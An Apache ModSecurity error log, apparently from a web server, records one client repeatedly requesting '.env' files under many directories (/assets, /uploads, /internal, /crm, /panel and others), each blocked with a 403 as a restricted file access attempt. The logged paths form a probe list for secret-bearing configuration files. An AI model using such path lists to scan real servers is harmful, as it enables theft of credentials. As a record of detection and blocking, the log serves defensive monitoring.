[Mon May 11 18:07:11.108944 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rw-Qm4vhlWBPlMjd-gAAAAo"]
[Mon May 11 18:07:11.390775 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/resources/.env"] [unique_id "agH-rw-Qm4vhlWBPlMjd-wAAAAo"]
[Mon May 11 18:07:11.391006 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/resources/.env"] [unique_id "agH-rw-Qm4vhlWBPlMjd-wAAAAo"]
[Mon May 11 18:07:11.391304 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rw-Qm4vhlWBPlMjd-wAAAAo"]
[Mon May 11 18:07:11.658959 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/assets/.env"] [unique_id "agH-rw-Qm4vhlWBPlMjd_AAAAAo"]
[Mon May 11 18:07:11.659214 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/assets/.env"] [unique_id "agH-rw-Qm4vhlWBPlMjd_AAAAAo"]
[Mon May 11 18:07:11.659522 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-rw-Qm4vhlWBPlMjd_AAAAAo"]
[Mon May 11 18:07:12.115423 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/uploads/.env"] [unique_id "agH-sA-Qm4vhlWBPlMjd_QAAAAo"]
[Mon May 11 18:07:12.116272 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/uploads/.env"] [unique_id "agH-sA-Qm4vhlWBPlMjd_QAAAAo"]
[Mon May 11 18:07:12.116666 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sA-Qm4vhlWBPlMjd_QAAAAo"]
[Mon May 11 18:07:12.682943 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/internal/.env"] [unique_id "agH-sA-Qm4vhlWBPlMjd_wAAAAo"]
[Mon May 11 18:07:12.683236 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/internal/.env"] [unique_id "agH-sA-Qm4vhlWBPlMjd_wAAAAo"]
[Mon May 11 18:07:12.683537 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sA-Qm4vhlWBPlMjd_wAAAAo"]
[Mon May 11 18:07:13.109291 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/tools/.env"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAQAAAAo"]
[Mon May 11 18:07:13.109502 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/tools/.env"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAQAAAAo"]
[Mon May 11 18:07:13.109777 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAQAAAAo"]
[Mon May 11 18:07:13.483619 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/scripts/.env"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAgAAAAo"]
[Mon May 11 18:07:13.483856 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/scripts/.env"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAgAAAAo"]
[Mon May 11 18:07:13.484167 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAgAAAAo"]
[Mon May 11 18:07:13.831762 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bin/.env"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAwAAAAo"]
[Mon May 11 18:07:13.832099 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bin/.env"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAwAAAAo"]
[Mon May 11 18:07:13.832432 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sQ-Qm4vhlWBPlMjeAwAAAAo"]
[Mon May 11 18:07:14.225780 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sbin/.env"] [unique_id "agH-sg-Qm4vhlWBPlMjeBAAAAAo"]
[Mon May 11 18:07:14.225958 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sbin/.env"] [unique_id "agH-sg-Qm4vhlWBPlMjeBAAAAAo"]
[Mon May 11 18:07:14.226234 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sg-Qm4vhlWBPlMjeBAAAAAo"]
[Mon May 11 18:07:14.678498 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/local/.env"] [unique_id "agH-sg-Qm4vhlWBPlMjeBgAAAAo"]
[Mon May 11 18:07:14.678699 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/local/.env"] [unique_id "agH-sg-Qm4vhlWBPlMjeBgAAAAo"]
[Mon May 11 18:07:14.678965 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sg-Qm4vhlWBPlMjeBgAAAAo"]
[Mon May 11 18:07:14.936610 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agH-sg-Qm4vhlWBPlMjeBwAAAAo"]
[Mon May 11 18:07:14.936844 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agH-sg-Qm4vhlWBPlMjeBwAAAAo"]
[Mon May 11 18:07:14.937143 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sg-Qm4vhlWBPlMjeBwAAAAo"]
[Mon May 11 18:07:15.415881 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dashboard/.env"] [unique_id "agH-sw-Qm4vhlWBPlMjeCAAAAAo"]
[Mon May 11 18:07:15.416118 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dashboard/.env"] [unique_id "agH-sw-Qm4vhlWBPlMjeCAAAAAo"]
[Mon May 11 18:07:15.416417 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sw-Qm4vhlWBPlMjeCAAAAAo"]
[Mon May 11 18:07:15.710954 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/panel/.env"] [unique_id "agH-sw-Qm4vhlWBPlMjeCgAAAAo"]
[Mon May 11 18:07:15.711197 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/panel/.env"] [unique_id "agH-sw-Qm4vhlWBPlMjeCgAAAAo"]
[Mon May 11 18:07:15.711532 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-sw-Qm4vhlWBPlMjeCgAAAAo"]
[Mon May 11 18:07:16.128259 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agH-tA-Qm4vhlWBPlMjeCwAAAAo"]
[Mon May 11 18:07:16.128501 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agH-tA-Qm4vhlWBPlMjeCwAAAAo"]
[Mon May 11 18:07:16.130144 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.179.223.6:39002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-tA-Qm4vhlWBPlMjeCwAAAAo"]
